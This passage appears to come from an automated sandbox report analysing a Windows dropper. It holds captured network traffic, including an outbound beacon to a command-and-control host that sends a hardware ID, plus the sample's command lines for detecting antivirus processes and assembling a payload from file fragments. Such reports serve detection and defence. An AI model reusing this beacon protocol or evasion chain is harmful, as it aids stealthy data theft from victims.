b8 d7 2a b6 78 d5 7a e6 Data Ascii: P>g""SUhP~>cyN<.MPY'3oK^jzpKXF25h!`l,as/'4hcg\|'$S@9"Irl(}WhCsZYa,a$TH?>W;?C9)Swd)OF5#^~S$6&hz!rI{ S8x(?C1bQ*xz
2024-10-28 13:08:02 UTC	15331	OUT	Data Raw: 65 44 99 f1 2e d5 a2 c1 1d da 3c 01 63 51 01 1f 83 e6 fa be 1c a6 62 ac c4 5f 97 f1 e6 99 d1 20 2e ca ae 27 0d 9e d5 6a fe d0 65 71 7b 7d 33 1c 25 fe 11 69 90 3c a9 55 24 4e 05 e2 2c 7b 71 b1 e7 e4 8b ba b8 93 c4 da e6 aa ca 02 6b b6 41 c4 42 c9 6f 97 3d 72 e7 15 04 07 b5 b7 02 7f b7 9d 81 ce b8 1e f5 1c 07 9d b7 c7 14 ae c0 3f ab 5d a6 22 58 4a 8e a5 1d a7 93 27 0d 1f dc 04 1e 32 f2 4f 5b 75 57 1a 7e 74 7f 9d 19 a8 6c b2 47 4f b3 7d 43 37 99 25 1d 92 33 53 66 c7 7e d0 f7 b0 74 a8 9a 1b 9b 89 46 15 ea e3 59 51 ae ab 25 85 1b d1 eb 39 5a 93 d2 97 6b 7e 91 d3 ee b4 ae a6 4f b0 77 cc dd ae 9a e6 fd b7 b7 ed ed 90 98 90 db f1 88 b3 f2 4b 75 c8 65 ec 4d 56 9b 5b d3 e0 15 c1 ca 1b aa 14 b6 bf f8 6a cb 40 88 eb 8a de 15 87 45 ba 2e ad 72 44 1e 09 3e 9a 6c 15 77 Data Ascii: eD.<cQb_ .'jeq{}3%i<U$N,{qkABo=r?]"XJ'2O[uW~tlGO}C7%3Sf~tFYQ%9Zk~OwKueMV[j@E.rD>lw
2024-10-28 13:08:02 UTC	15331	OUT	Data Raw: b9 f1 cc 4a 32 fe f1 11 94 05 41 9f 4d 58 1f 2b f9 9e e8 a8 96 df c2 91 ab bb 33 8a 37 84 27 84 40 f9 2b 5c f3 b8 d9 30 be 3f a2 08 17 09 12 04 88 1e 50 17 67 53 0f c0 c9 84 72 83 49 d4 95 49 8c 73 b5 b6 1a 2e 28 96 8d f8 9b 89 8d 9c d3 2f 07 65 79 42 4e 51 b0 22 c8 16 22 c9 2c fe b1 09 55 59 c9 3f 68 8f 0e cb b4 21 5f c2 0a bf 54 ca 7e 68 60 1c 51 66 92 2d 89 08 e5 3c 27 41 ed 30 67 05 6c 14 9e 75 d4 59 ce 53 dd ad a2 5a ad d2 de f8 a0 fb ee 38 74 89 98 3d bd ce 65 a6 67 28 74 99 77 3d 47 26 9f 0f 7b c8 30 c7 6d 93 a1 55 2a e5 4a df 35 f0 fa a3 b9 0b b8 1c 3f ef 3a 89 f9 f6 02 96 56 c8 dd 5e 69 3a c8 e0 c0 a9 5b e3 4e 15 5c 48 f0 e9 d6 eb 46 1e 30 38 e4 38 6c 7d d0 05 23 bc f9 7e ca 7f e7 0d 4d d3 00 75 69 c7 3b 78 e9 8a 10 72 67 a5 6a 58 d8 5f 31 e5 47 Data Ascii: J2AMX+37'@+\0?PgSrIIs.(/eyBNQ"",UY?h!_T~h`Qf-<'A0gluYSZ8t=eg(tw=G&{0mU*J5?:V^i:[N\HF088l}#~Mui;xrgjX_1G
2024-10-28 13:08:02 UTC	15331	OUT	Data Raw: 5c c2 a1 28 5f e5 98 36 13 d4 8d 71 ec 6f d9 d3 11 78 c2 41 4d b5 e3 d2 2a 6e 71 99 d2 3e 63 f5 ef df 2c 6e e0 27 0d 0b ec bc d7 9e a9 a6 47 2e 13 87 72 ee 2f df c3 01 2b 66 5b b5 50 c5 01 a7 cf a6 e1 ad ea 25 5a 02 df ee d2 4c e6 d3 4a 3d b4 88 81 8b 58 91 14 af 19 69 9a 9d 85 92 22 ec 07 8d 9f 92 88 2d fc 37 4d ab de 59 34 ae c6 59 78 44 86 30 6e 80 17 47 a8 4f b5 68 e0 d5 bd ee d3 53 f2 47 56 9b 1e ef ce 68 31 6f 8c 57 d1 82 fe f3 25 9e 0c 53 21 50 81 70 84 7b dd fd ac 37 d6 55 52 ce 65 30 a9 44 bb 03 f5 a5 59 27 bf de 4f 78 dc f8 74 ad 9c b2 e8 d7 45 07 a6 77 56 02 7c 95 a3 3f 27 b6 eb 9c 5f cf 66 8a c4 d2 79 4c 86 28 35 ec 2f 2f 66 85 69 9b 74 02 ac d9 24 a3 0b de cf 0f f3 35 28 ab 44 12 89 9e 2b c6 99 04 f0 67 24 20 1c a0 bb dc 55 5b 75 a1 2b a2 99 Data Ascii: \(_6qoxAM*nq>c,n'G.r/+f[P%ZLJ=Xi"-7MY4YxD0nGOhSGVh1oW%S!Pp{7URe0DY'OxtEwV\|?'_fyL(5//fit$5(D+g$ U[u+
2024-10-28 13:08:02 UTC	15331	OUT	Data Raw: 3a 4e 52 0f 28 11 95 91 b9 41 23 21 a5 24 60 74 c5 26 58 4d ce e3 3d e5 81 53 b9 81 bf f4 d0 2c 4c 53 bd 1a bb 1c b1 e0 d1 ef 52 f9 c6 f9 2a da 91 88 da 80 60 45 2a f3 98 00 ec 8c f9 3e 1b f2 14 45 ad 67 58 00 e6 15 d6 d1 c3 c8 5a fc 1b f4 70 10 9f 5b 20 0e 2a 91 94 ef cf bc c1 1b 6e ee d6 d2 40 ca 82 7a 17 ae 0a ba 67 9e 95 89 c5 a8 49 1c 8c b5 11 06 6b 99 a0 a1 ab 02 bf 14 d2 8e 9a 19 88 41 f1 5c 35 74 cf f6 c5 9e 48 a0 e7 25 97 18 f3 35 85 bf dc 00 49 f9 cc 84 d0 08 b2 ee 7e 42 db 56 6f d6 65 a0 ad 73 35 c0 b5 79 ef e8 f1 85 2f 33 94 e9 c9 cf 1a 2b ea 0f 67 93 16 8d 29 e9 c3 68 8e 6f a6 e2 7c ce 43 50 df f7 4b 4b 5a d9 9b db fb 96 2e 05 2e a8 19 4a a8 9c 44 8a 71 cf 8f 7e 50 ae 07 48 ec 4b 5d f7 d3 c2 f1 32 97 05 5e 83 c6 ba 7a 19 76 1d d6 87 40 65 a7 Data Ascii: :NR(A#!$`t&XM=S,LSR`E>EgXZp[ *n@zgIkA\5tH%5I~BVoes5y/3+g)ho\|CPKKZ..JDq~PHK]2^zv@e
2024-10-28 13:08:02 UTC	15331	OUT	Data Raw: 3f 99 37 dc 57 e0 79 8b 08 e7 6c a9 9d a0 c2 33 e7 dc 81 c2 45 2b fa 29 04 cd cb 92 0b 76 be 74 08 d6 b8 02 dc 86 d5 d3 f7 3c bf c6 e3 c9 38 ac 75 21 85 fb a2 74 78 06 44 e5 6c 9e 0b 10 a4 03 d1 bc 1e 18 f5 bd fd 39 40 33 e7 ec 26 67 ca c7 65 27 49 d1 2b c0 fa 01 03 07 e2 db c4 e8 dd 7c e0 c8 7f 9a db 17 4f cb cd db 85 cd 8f d6 c5 83 d9 16 03 25 23 92 e2 7a 91 97 c1 e3 f0 12 8e 4e cd 3e 48 b4 88 dd dd 71 d5 42 12 5a 39 85 93 54 a9 b0 b5 74 b8 cd 56 5d 10 6c c3 75 f1 0e cf ce ae 36 8f 6a 8b d0 bf 88 87 10 3a e6 08 97 c0 94 86 c2 85 b1 7b 4f f8 73 2c ce 3b d7 a5 09 98 66 3f d7 46 79 9b 77 13 9d f6 1a 57 06 49 40 8d 15 ad 48 de c4 fa d0 05 de 51 7d 3f cc 1b 17 ae dc 55 15 34 63 4d bb 75 f7 67 6a 91 37 fb d1 b5 5a b4 d8 65 cc de c1 48 1a e6 d8 c4 37 ad f0 ff Data Ascii: ?7Wyl3E+)vt<8u!txDl9@3&ge'I+\|O%#zN>HqBZ9TtV]lu6j:{Os,;f?FywWI@HQ}?U4cMugj7ZeH7
2024-10-28 13:08:02 UTC	15331	OUT	Data Raw: c7 bd 95 41 98 4b 71 9c 82 ad 8f a1 48 52 34 bc 91 fa dd 36 a5 29 72 b2 b4 83 19 e2 42 34 3b 45 04 86 8f ef a3 88 d6 27 78 2f 95 37 86 18 8a 3c cb 1c 2c e7 52 c0 62 c5 f6 d7 52 36 df 71 77 af f3 74 97 19 91 90 5c 7b 9c 0d c1 01 64 2c 0e 30 e9 e1 e8 b7 1a 8e f7 7d 25 9c 54 00 b1 6e 0c 2b 5d ab f1 24 12 21 7a a0 1c f9 10 c8 59 1e be 8c 12 6b e7 ef 70 54 80 49 fc 4c c0 22 fa b1 14 41 a7 a9 0a 49 26 91 b2 7b 55 83 9c 8b 8a 5a 4a fa 00 92 bd 48 b1 de e4 33 f0 25 2f 03 49 be 32 06 96 81 05 e2 e8 c4 59 61 3e 9a 25 67 79 01 57 72 19 71 08 59 14 38 15 7a 01 05 5b 37 85 d6 1b e0 96 6e d3 db 19 3f 41 7b 83 d6 99 70 ee 5d 4a 92 92 a1 a1 00 24 7b c2 82 66 58 a0 b8 77 88 70 65 11 47 28 8c dd 12 64 0a 70 21 56 8e c9 a4 29 21 20 6c 89 da 2e 96 65 cd 85 c0 10 49 b2 03 54 Data Ascii: AKqHR46)rB4;E'x/7<,RbR6qwt\{d,0}%Tn+]$!zYkpTIL"AI&{UZJH3%/I2Ya>%gyWrqY8z[7n?A{p]J${fXwpeG(dp!V)! l.eIT
2024-10-28 13:08:02 UTC	15331	OUT	Data Raw: cc 64 52 b4 ad 6c 70 23 b2 c7 5a 59 09 05 74 4b 7b 8c b6 46 a7 cf 78 bc 9d 9a 51 05 a7 6d d3 bf e0 7b b2 e0 d0 81 a9 94 40 0f f2 59 13 5b d9 89 8a 80 db 0d d3 50 9d 47 69 4b 22 25 8c c6 ce 5f 0d 88 d9 8f f3 80 6e 17 83 a2 d7 ac e3 56 c6 fe 6d 37 ef bd ad 22 c4 21 5f ec 7b b9 3c fe f4 bf ad 4a e7 51 61 32 79 8f c2 f2 6c e0 10 06 9b df 6d bd ff 8c f4 c5 95 20 d7 df 1f 5f 45 1b 14 2c 26 a4 96 0c d1 7c 32 1d 4e c5 8f 86 ae 3c 59 ef bb 43 d3 67 a6 ce e7 47 3e 4c 0b 60 f9 f2 c7 7a 43 f8 09 de f8 c6 9b 33 78 a5 ef a6 c4 14 7a 93 f4 0d 96 f4 01 bb a0 19 89 00 87 95 37 15 be 4a bc 51 ec 42 d3 6a 52 74 a6 75 c6 e1 02 c0 fe 9b 7d 53 87 35 d9 51 ec e7 cc 7d 13 e4 fd 57 6b 08 c1 0d a4 42 23 80 94 80 f0 0a 3e e4 ca ac 0b 02 c9 25 00 fa d7 fe f1 de 60 65 51 d6 3e e4 de Data Ascii: dRlp#ZYtK{FxQm{@Y[PGiK"%_nVm7"!_{<JQa2ylm _E,&\|2N<YCgG>L`zC3xz7JQBjRtu}S5Q}WkB#>%`eQ>
2024-10-28 13:08:04 UTC	1013	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 13:08:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ik65f33m77t7di48vll9ke4oo5; expires=Fri, 21 Feb 2025 06:54:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4QHiFEOlOh7ZBqz2ucPqesE7sfpEbs6B%2BAZ2jaqrule6xFLta9wa6PNYJI8NxSOTkJ9nY60CplABYTRe9MnGoSPRDdTgHeepiJBekVJRbxYLqdV6KzHTtfU7PSSZ6QoAW5w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b26fe7d056b34-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1186&sent=227&recv=628&lost=0&retrans=0&sent_bytes=2835&recv_bytes=581587&delivery_rate=2236293&cwnd=251&unsent_bytes=0&cid=bf60a95ad398fd6a&ts=1829&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49969	104.21.9.13	443	7132	C:\Users\user\AppData\Local\Temp\756341\Place.pif

Timestamp	Bytes transferred	Direction	Data
2024-10-28 13:08:05 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 83 Host: faulteyotk.site
2024-10-28 13:08:05 UTC	83	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 49 52 69 61 46 69 2d 2d 32 38 31 30 6d 72 26 6a 3d 26 68 77 69 64 3d 39 39 32 42 39 44 30 30 38 30 41 43 33 45 43 42 33 30 37 46 33 45 43 41 31 43 34 33 45 36 38 35 Data Ascii: act=get_message&ver=4.0&lid=IRiaFi--2810mr&j=&hwid=992B9D0080AC3ECB307F3ECA1C43E685
2024-10-28 13:08:05 UTC	1013	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 13:08:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9sqicpos2f6le08f0gg1nkg60a; expires=Fri, 21 Feb 2025 06:54:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2FlsRtpH1uFoD8erdxhyAkBZgrQ05GS6x5u4%2BKEoPTrM1yUdRbLrPwQLQbXLEGqrzYZQan%2FkV2DGB6HbmkSKrS%2Bn48lTZ1IkJlJQ6SYr3iqrfzTK%2BcOcDOx0covRGBqiMP8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b270daeea6b43-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1269&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=982&delivery_rate=2327974&cwnd=251&unsent_bytes=0&cid=fc9360d5fd0fc34d&ts=561&x=0"
2024-10-28 13:08:05 UTC	54	IN	Data Raw: 33 30 0d 0a 54 72 7a 72 46 77 6c 52 5a 42 75 67 69 57 73 49 56 57 64 35 63 30 53 46 34 6c 63 38 67 5a 79 48 76 65 64 47 6b 6d 67 74 4f 39 6f 56 34 51 3d 3d 0d 0a Data Ascii: 30TrzrFwlRZBugiWsIVWd5c0SF4lc8gZyHvedGkmgtO9oV4Q==
2024-10-28 13:08:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:07:01
Start date:	28/10/2024
Path:	C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe"
Imagebase:	0x400000
File size:	1'057'550 bytes
MD5 hash:	68A5A9E169248C593AA8080E6172BF86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:07:02
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Belly Belly.bat & Belly.bat
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:07:02
Start date:	28/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:07:04
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x320000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:07:04
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0xbc0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:07:05
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x320000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:07:05
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase:	0xbc0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:07:05
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 756341
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:07:05
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "MENTIONSTATICARGUEKEEPS" Abuse
Imagebase:	0xbc0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:07:05
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Significant + ..\Bow + ..\Olympics + ..\Intimate + ..\Tobago + ..\Suzuki + ..\Relevance V
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:07:05
Start date:	28/10/2024
Path:	C:\Users\user\AppData\Local\Temp\756341\Place.pif
Wow64 process (32bit):	true
Commandline:	Place.pif V
Imagebase:	0x580000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:07:06
Start date:	28/10/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xb10000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	17.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1526
Total number of Limit Nodes:	33

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

{, xrefs: 00405352
New install of "%s" to "%s", xrefs: 00405182
@rD, xrefs: 004053D7

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

NCRC, xrefs: 0040397C
Error launching installer, xrefs: 00403A7D
~nsu.tmp, xrefs: 00403AF7
NSIS Error, xrefs: 004038E2
_?=, xrefs: 00403A64
1C, xrefs: 00403B56
SeShutdownPrivilege, xrefs: 00403C16
/D=, xrefs: 004039A6
\Temp, xrefs: 00403A1B

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
